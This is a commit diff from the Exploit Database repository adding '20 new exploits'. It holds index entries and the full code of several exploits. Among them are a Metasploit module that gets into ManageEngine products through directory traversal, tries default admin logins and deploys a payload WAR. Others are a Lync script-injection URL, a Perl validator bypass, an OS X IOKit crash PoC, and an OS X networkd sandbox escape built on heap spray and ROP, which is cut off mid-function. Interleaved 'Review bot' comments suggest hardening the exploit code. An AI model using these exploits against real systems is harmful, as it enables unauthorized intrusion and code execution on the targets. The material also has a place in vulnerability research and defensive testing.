Update: 2015-01-22

20 new exploits
This commit is contained in:
Offensive Security 2015-01-22 08:36:41 +00:00
parent 66b6bb6da3
commit cdb1e00bef
21 changed files with 1702 additions and 2 deletions


@ -27253,7 +27253,7 @@ id,file,description,date,author,platform,type,port
30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0
30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0
30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,"Parvez Anwar",windows,remote,0
30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0
30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0
@ -27391,7 +27391,7 @@ id,file,description,date,author,platform,type,port
30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,"Parvez Anwar",windows,remote,0
30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0
30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0
30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0
@ -32274,6 +32274,7 @@ id,file,description,date,author,platform,type,port
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
@ -32283,3 +32284,22 @@ id,file,description,date,author,platform,type,port
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0
35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0
35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0
35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0
35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0
35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0
35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0



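--- a/platforms/asp/webapps/35852.txt
+++ b/platforms/asp/webapps/35852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48235/info
+Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
+Attackers can exploit this issue to execute arbitrary commands in the context of the application.
+Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected.
+https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29//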
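Review bot: The advisory text describes a remote command-injection issue that executes "arbitrary commands in the context of the application", but the only PoC given is a script injection: the `reachLocale` value closes a JavaScript string (`en-us";`) and runs `open(xxx);alert(...)` in the visitor's browser, which is reflected cross-site scripting, not server-side command execution. Readers triaging from the text alone will rate this as RCE, so the wording should match the PoC, e.g. `Microsoft Lync Server 2010 is prone to a reflected cross-site scripting vulnerability because ReachJoin.aspx fails to properly sanitize the reachLocale parameter.` and `Attackers can exploit this issue to execute arbitrary script in the browser of a user who follows a crafted link.` A line stating the expected result of the PoC (a popup window and an alert box, if that is what was observed) would also make the check verifiable.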

437
platforms/java/remote/35845.rb Executable file

@ -0,0 +1,437 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Multiple Products Authenticated File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
the upload does not handle correctly '../' sequences, which can be abused to write
in the file system. Authentication is needed to exploit this vulnerability, but this module
will attempt to login using the default credentials for the administrator and guest
accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
been tested successfully in Windows and Linux on several versions.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5301'],
['OSVDB', '116733'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Automatic', { } ],
[ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
{
'attachment_path' => '/workorder/Attachment.jsp'
}
],
[ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
],
[ 'IT360 v8-v10.4',
{
'attachment_path' => '/common/FileAttachment.jsp'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 15 2014'))
register_options(
[
Opt::RPORT(8080),
OptString.new('JSESSIONID',
[false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
OptString.new('IAMAGENTTICKET',
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME',
[true, 'The username to login as', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to'])
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
# Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
version = [ 9999, 9999, 0, 'sd' ]
if res && res.code == 200
if res.body.to_s =~ /ManageEngine ServiceDesk/
if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
output = $1
version = [output[0].to_i, output[2].to_i, '0', 'sd']
end
if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds
version[2] = $1.to_i
elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine AssetExplorer/
if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
output = $1
version = [output[0].to_i, output[2].to_i, 0, 'ae']
end
if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
version[2] = $1.to_i
end
elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
# All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
version[3] = 'sc'
if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
# ... but get the build number if we can find it
version[2] = $1.to_i
end
elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
# IT360 newer versions
version[3] = 'it'
end
elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
# IT360 older versions, not a very good detection string but there is no alternative?
version[3] = 'it'
end
version
end
def check
version = get_version
# TODO: put fixed version on the two ifs below once (if...) products are fixed
# sd was fixed on build 9031
# ae and sc still not fixed
if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
(version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
(version[3] == 'sc' && version[2] < 99999)
return Exploit::CheckCode::Appears
end
if (version[2] > 9030 && version[3] == 'sd') ||
(version[2] > 99999 && version[3] == 'ae') ||
(version[2] > 99999 && version[3] == 'sc')
return Exploit::CheckCode::Safe
else
# An IT360 check always lands here, there is no way to get the version easily
return Exploit::CheckCode::Unknown
end
end
def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'false'
}
else
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
}
end
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
'service' => 'ServiceDesk',
'furl' => '/',
'timestamp' => Time.now.to_i
},
'vars_post' => vars_post
})
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
else
return nil
end
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/")
})
cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
return nil
end
end
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET']
cookie_name = get_it360_cookie_name
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.redirect?
uri = [ res.redirection.port, res.redirection.path ]
else
return nil
end
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
if cookie != nil
return cookie
else
# Try one more time with the default admin login for some versions
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
if cookie != nil
return cookie
end
end
end
nil
end
#
# Authenticate and validate our session cookie. We need to submit credentials to
# j_security_check and then follow the redirect to HomePage.do to create a valid
# authenticated session.
#
def authenticate(cookie, username, password)
res = send_request_cgi!({
'method' => 'POST',
'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => {
'j_username' => username,
'j_password' => password,
'logonDomainName' => datastore['DOMAIN_NAME']
}
})
if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
# sd and ae respond with 302 while sc responds with a 200
return true
else
return false
end
end
def login
# Do we already have a valid cookie? If yes, just return that.
if datastore['JSESSIONID'] != nil
cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
return cookie
end
# First we get a valid JSESSIONID to pass to authenticate()
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.code == 200
cookie = res.get_cookies
authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
if authenticated
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
authenticated = authenticate(cookie, 'administrator', 'administrator')
if authenticated
return cookie
else
# Try one more time with the default admin login for some versions
authenticated = authenticate(cookie, 'admin', 'admin')
if authenticated
return cookie
end
end
end
end
nil
end
def send_multipart_request(cookie, payload_name, payload_str)
if payload_name =~ /\.ear/
upload_path = '../../server/default/deploy'
else
upload_path = rand_text_alpha(4+rand(4))
end
post_data = Rex::MIME::Message.new
if @my_target == targets[1]
# old style
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
else
post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
end
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(@my_target['attachment_path']),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie
})
return res
end
def pick_target
return target if target.name != 'Automatic'
version = get_version
if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
(version[0] == 4 && version[3] == 'ae') ||
(version[3] == 'sc')
# These are all "old style" versions (sc is always old style)
return targets[1]
elsif version[3] == 'it'
return targets[3]
else
return targets[2]
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}")
if @my_target == targets[3]
cookie = login_it360
else
cookie = login
end
if cookie.nil?
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
app_xml << '<application>'
app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + '.war', war_payload.to_s)
ear_file.add_file('META-INF/application.xml', app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
if @my_target != targets[3]
# Linux doesn't like it when we traverse non existing directories,
# so let's create them by sending some random data before the EAR.
# (IT360 does not have a Linux version so we skip the bogus file for it)
print_status("#{peer} - Uploading bogus file...")
res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
if res && res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
end
end
# Now send the actual payload
print_status("#{peer} - Uploading EAR file...")
res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful")
else
fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi({
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
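Review bot: `get_it360_cookie_name` calls `res.get_cookies` without checking that `send_request_cgi` returned a response, so a timeout raises NoMethodError instead of the `fail_with` the rest of the module uses, and `login_it360` then concatenates the possibly-nil name into the cookie string, which raises TypeError. Add `return nil unless res` before the regex in `get_it360_cookie_name`, and in the pre-authenticated branch of `login_it360` add `fail_with(Failure::Unknown, "#{peer} - Could not determine IAMAGENTTICKET cookie name") if cookie_name.nil?`. It is also worth stating in the description that when USERNAME is left at `guest` and no cookie is supplied, `login` and `login_it360` go on to try `administrator/administrator` and `admin/admin`, since an operator may not expect those extra failed logins to appear in the target's audit log; a one-line comment above the fallback branches, `# Fallback to vendor default admin credentials; this leaves failed-login entries on the target`, would make that explicit.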

27
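--- a/platforms/linux/remote/35836.pl
+++ b/platforms/linux/remote/35836.pl
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/48167/info
+The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
+An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
+Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
+#!/opt/perl/5.12/bin/perl
+use strict;
+use warnings;
+use Data::FormValidator;
+"some_unrelated_string" =~ m/^.*$/;
+my $profile = {
+untaint_all_constraints => 1,
+required => [qw(a)],
+constraint_methods => {
+a => qr/will_never_match/,
+},
+};
+my $results = Data::FormValidator->check({ a => 1 }, $profile);
+warn $results->valid('a');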
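Review bot: The four advisory lines at the top of the file (`source: ...` through `Data::FormValidator 4.66 is vulnerable; ...`) sit above the shebang as bare text, so `perl 35836.pl` dies with syntax errors before the PoC runs; prefix each with `#`, e.g. `# source: http://www.securityfocus.com/bid/48167/info`. The shebang `#!/opt/perl/5.12/bin/perl` is site-specific and `#!/usr/bin/env perl` would be the portable form. The script also never says what a vulnerable run looks like: presumably `warn $results->valid('a')` prints `1` even though the `will_never_match` constraint cannot succeed, with the unrelated `m/^.*$/` match above being what leaks through `untaint_all_constraints` — if that is the observed behaviour, a comment such as `# vulnerable: prints 1 (value passes as valid despite the failing constraint); fixed: valid('a') is undef` would let the reader verify the result.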

46
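--- a/platforms/osx/dos/35849.c
+++ b/platforms/osx/dos/35849.c
@@ -0,0 +1,46 @@
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <IOKit/IOKitLib.h>
+int main(){
+kern_return_t err;
+CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
+if(!matching){
+printf("unable to create service matching dictionary\n");
+return 0;
+}
+io_iterator_t iterator;
+err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
+if (err != KERN_SUCCESS){
+printf("no matches\n");
+return 0;
+}
+io_service_t service = IOIteratorNext(iterator);
+if (service == IO_OBJECT_NULL){
+printf("unable to find service\n");
+return 0;
+}
+printf("got service: %x\n", service);
+io_connect_t conn = MACH_PORT_NULL;
+err = IOServiceOpen(service, mach_task_self(), 2, &conn);
+if (err != KERN_SUCCESS){
+printf("unable to get user client connection\n");
+return 0;
+}else{
+printf("got userclient connection: %x\n", conn);
+}
+mach_vm_address_t addr = 0x414100000000;
+mach_vm_size_t size = 0x1000;
+err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
+return 0;
+}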
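Review bot: Every early-exit branch in `main` returns 0 and the `kern_return_t` from the final `IOConnectMapMemory` call is discarded, so a test harness cannot distinguish "no IntelAccelerator service / user client refused" from "mapping rejected, likely patched" from the intended crash; return non-zero from the failure branches and report the last call, e.g. `printf("IOConnectMapMemory returned 0x%x\n", err); return err == KERN_SUCCESS ? 0 : 1;`. The iterator and service objects are never released with `IOObjectRelease`, which is harmless for a one-shot DoS PoC but worth a comment. A header comment naming the tested build (the index entry says OS X 10.10) and the expected outcome — presumably a kernel panic, given the NULL-pointer-dereference title — would also help, since nothing in the file explains what user-client type `2` and memory type `3` refer to.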

185
platforms/osx/local/35847.c Executable file

@ -0,0 +1,185 @@
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
// ianbeer
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"
/* find the base address of CoreFoundation for the ROP gadgets */
void* find_library_load_address(const char* library_name){
kern_return_t err;
// get the list of all loaded modules from dyld
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
// from which we can get the names and load addresses of all modules
task_dyld_info_data_t task_dyld_info;
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
const char* image_name = image_infos[i].imageFilePath;
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
if (strstr(image_name, library_name)){
return (void*)image_load_address;
}
}
return NULL;
}
struct heap_spray {
void* fake_objc_class_ptr; // -------+
uint8_t pad0[0x10]; // |
uint64_t first_gadget; // |
uint8_t pad1[0x8]; // |
uint64_t null0; // |
uint64_t pad3; // |
uint64_t pop_rdi_rbp_ret; // |
uint64_t rdi; // |
uint64_t rbp; // |
uint64_t system; // |
struct fake_objc_class_t { // |
char pad[0x10]; // <----------+
void* cache_buckets_ptr; //--------+
uint64_t cache_bucket_mask; // |
} fake_objc_class; // |
struct fake_cache_bucket_t { // |
void* cached_sel; // <--------+ //point to the right selector
void* cached_function; // will be RIP :)
} fake_cache_bucket;
char command[256];
};
xpc_connection_t connect(){
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
return conn;
}
void go(){
void* heap_spray_target_addr = (void*)0x120202000;
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(hs, 'C', 0x1000);
hs->null0 = 0;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
// nasty hack to find the correct selector address :)
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
uint64_t sel = msgrefs[1];
printf("%p\n", sel);
hs->fake_cache_bucket.cached_sel = sel;
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
// pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
// jump over the NULL then so there's more space:
//pop, pop, pop, ret: //and keep stack correctly aligned
hs->first_gadget = CoreFoundation_base + 0x46ef7;
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
hs->system = dlsym(RTLD_DEFAULT, "system");
hs->rdi = &hs->command;
strcpy(hs->command, "touch /tmp/hello_networkd");
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
}
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
xpc_dictionary_set_uint64(msg, "type", 6);
xpc_dictionary_set_uint64(msg, "connection_id", 1);
xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
xpc_object_t conn_list = xpc_array_create(NULL, 0);
xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
